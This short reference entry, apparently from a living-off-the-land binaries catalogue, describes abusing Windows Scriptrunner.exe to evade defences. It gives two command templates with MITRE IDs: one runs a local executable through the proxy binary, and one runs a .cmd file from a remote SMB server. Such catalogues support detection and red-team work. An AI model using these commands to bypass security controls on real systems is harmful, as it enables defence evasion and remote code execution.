Scriptrunner.exe

Execute binary through proxy binary to evade defensive counter measures

Execute

Execute binary through proxy binary to evade defensive counter measures

Scriptrunner.exe -appvscript {PATH:.exe}

Executes executable — MITRE: T1202 — Privileges: User

Execute binary through proxy binary from external server to evade defensive counter measures

ScriptRunner.exe -appvscript {PATH_SMB:.cmd}

Executes cmd file from remote server — MITRE: T1218 — Privileges: User